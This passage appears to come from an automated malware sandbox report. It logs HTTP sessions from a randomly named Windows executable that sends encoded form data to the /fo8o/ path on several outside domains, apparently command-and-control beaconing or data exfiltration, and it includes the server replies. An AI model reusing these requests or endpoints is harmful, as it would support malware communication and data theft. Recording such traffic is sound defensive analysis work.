wP=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/NQCeaKPFoXJrI2YZE+CG0V8juGpnQP9Umm9GkTGMNuoB5Z4WUfXAADdHnNG+bW9qC+M5Fy3rer0KgTHVGc32h0jV3pDUgigteU2+wnMF6pkGwiXPMVsnfzEdiHzb8tJ3lYO+t4MMTxv7IOCPYwqBMvkM4a4NWyfNyLUo3daVh963mW3GTg3u4mSS2ECnzTs/FrMzIyRxPgiE+/3MxguOZra2PFuuiPpvLORb2gBCWu7kBJlhECqd9P2zpqBr1sQHFR1rJzr+CHFjbM5xGnvyFoCenp6+Nv/ulEJDdsjNR5MfmLdk1aQNGJiVvIJQH43+2rtb0Z97HNL8AnaIwb94+dipdj+xLgE+IGsdJI5vENcGD+3I+x4o6fRklMLazVz33QU6UIXt3sq3CpyvbX/033E4TB19ZKyvvWensIPjg//22mA1QKxA0cKncQQyiU9ZiQya9T0eYl9ikuNAvpepGd+bgL3mKOu7LpnEowAp1WJ1vrxVXFI8CaVD3oN48hfr0SATtF3oiL7LNxCb8ay72SZt7H0UlynJrsHFPAI25eQ6ZJzUMGNc9F5iE9ShzmbksHkq516/uiveVVsPs1FegxAD8Rm6yFT62yDRNcaevLNBMQZPzqcgbHe48A5cin9qXvMrPAeJcpXGNmcLR7h8KUcq/Ar82nnIAlIViTmYayBmiqnxdSaamLN3L5LbNiFSA6e8xORc+gsguK6LPQh5hFcNIBom91svWqpwib76a3xJDlY9Dnow6vj2ql9klsFNFPkm2C5mfMj5EeSCfGgddARKUMuFm7HiFRHPvWf3QSG3a6sB4NS6wJQaYSJU7j/SUIf/+q3 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	54867	15.197.240.20	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:47.993971109 CEST	521	OUT	GET /fo8o/?wP=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.donnavariedades.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:03:48.455369949 CEST	405	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 12 Aug 2024 11:03:48 GMT Content-Type: text/html Content-Length: 265 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 50 3d 6c 2b 33 30 31 5a 76 49 54 43 78 61 58 39 41 48 6d 31 59 73 4c 36 35 35 6d 67 4f 54 39 75 66 4a 67 7a 63 74 4f 51 78 32 39 71 53 73 72 78 58 38 6b 77 34 39 79 6b 67 6d 75 6d 69 59 59 55 34 32 78 4d 47 78 56 69 67 35 4b 56 5a 72 4a 6f 73 50 62 73 39 70 43 54 47 31 64 6c 30 6e 39 5a 78 35 73 42 6f 76 58 71 6c 69 62 4c 47 2b 6f 54 51 67 43 5a 48 4d 41 31 41 46 34 78 66 64 53 5a 6b 4a 76 34 58 41 47 43 49 3d 26 66 50 68 34 55 3d 4d 4a 6f 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wP=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&fPh4U=MJo4"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	54870	217.196.55.202	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:04:01.989299059 CEST	790	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f Data Ascii: wP=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
Aug 12, 2024 13:04:02.564764977 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 12 Aug 2024 11:04:02 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	54871	217.196.55.202	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:04:04.518501043 CEST	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d Data Ascii: wP=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
Aug 12, 2024 13:04:05.093588114 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 12 Aug 2024 11:04:05 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	54872	217.196.55.202	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:04:07.056526899 CEST	1827	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 31 58 65 56 49 44 [TRUNCATED] Data Ascii: wP=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJwHWaHNny3DkcPzc/IfGnB72zQjWKa0reTy4wEsckqATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHeMtIQLo1ulFdPm/WZjwfg3pXLqJzL6uZk/hShK87J/B8NmdNvErSQkufL8hBA6zjEhyI6vGuUgH2s81XeVIDixDbnWIPixe5THOj1QX8Q7yqPkkxjHAxt+ggpiweeAg1wP76LC37rf6GaI5SASvonDhKMK42ZwjLnYCbzLpsDW6+lxtNU6KY0OpSMOyB9tpQUYABR2tO6zcGqRGhFeO8cDb871WKvJV2kIu8VmqYNpIfCSiLUB5tW18VukjKiTAT7SvDARlAZmM0B+L75MyEmXDWkRWxGyClElMITMefbC5NclUvpHwjCf5SM9zzt5tJPtM0o1agCyknjpzI9xq3HAAA9jzk4FKj9oqhUy45KY9s0VPu1RhxhCqTNJI/dYagWk4FoKQ6BMS1OfaNmEP6uVrKjJxiAFwbDOxuZpDRHEcxj4G0SAJ1uVgAfCJvJHZYLtd1wAQFg38hf2B+nsFLyyyOVDGnIfV3zC2fBe2ciH0I0iu4z1N5LddlXlYO6opVxpgLUoopx/pcLClB0CCHpLHlubs768Rp8skFn3/HEWJWZos8nnOPkJnv/DI8jCepFOpl5f5jTCTMFNnHQpyZSCLexonbe5T720PRkZoL1kkMlqK9qSkj3hhJj8P5IdVmldOFK+glMDimMQZOUx5VUGBjfJmbPiUI4HXHsFqq6rYOi2fmLAv6Ut1BwpcdBlY6iYLPL6ryNaK2eSEtNnpR7x0AcHqDGyh0viGZGuVzAxcwL2Y09KpcQr [TRUNCATED]
Aug 12, 2024 13:04:07.643873930 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 12 Aug 2024 11:04:07 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	54873	217.196.55.202	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:04:09.739938974 CEST	519	OUT	GET /fo8o/?wP=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:04:10.304749012 CEST	1221	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 12 Aug 2024 11:04:10 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?wP=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&fPh4U=MJo4 platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	54874	199.59.243.226	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:04:15.649187088 CEST	769	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.joyesi.xyz Origin: http://www.joyesi.xyz Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.joyesi.xyz/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 45 57 36 79 7a 36 52 78 51 76 48 46 58 6a 46 4b 4e 55 49 66 68 37 2f 79 57 39 34 37 56 52 50 48 53 69 6e 73 73 69 62 2f 32 37 64 54 71 54 55 46 74 70 4d 36 76 53 76 45 4b 58 50 38 6d 75 7a 61 66 43 38 36 38 77 6c 53 72 36 62 49 6f 34 5a 69 36 77 4e 34 34 6b 67 39 6c 49 51 71 73 6e 71 65 71 6e 63 63 73 68 52 4c 42 78 38 69 5a 76 55 61 37 4f 5a 61 59 4a 42 36 31 53 72 35 63 76 46 37 46 45 4b 47 59 73 5a 51 56 44 38 48 6c 76 71 42 59 70 2b 69 48 56 4e 49 46 54 72 63 45 6d 6a 56 79 53 63 2f 58 76 39 66 55 57 30 68 64 42 67 50 43 49 32 7a 79 30 65 53 2b 7a 4e 30 44 55 70 42 Data Ascii: wP=1hBK8uCOn0O6EW6yz6RxQvHFXjFKNUIfh7/yW947VRPHSinssib/27dTqTUFtpM6vSvEKXP8muzafC868wlSr6bIo4Zi6wN44kg9lIQqsnqeqnccshRLBx8iZvUa7OZaYJB61Sr5cvF7FEKGYsZQVD8HlvqBYp+iHVNIFTrcEmjVySc/Xv9fUW0hdBgPCI2zy0eS+zN0DUpB
Aug 12, 2024 13:04:16.122726917 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 12 Aug 2024 11:04:15 GMT content-type: text/html; charset=utf-8 content-length: 1106 x-request-id: 12a49c8e-d6e6-4823-80fc-0bd152efc20c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA== set-cookie: parking_session=12a49c8e-d6e6-4823-80fc-0bd152efc20c; expires=Mon, 12 Aug 2024 11:19:16 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 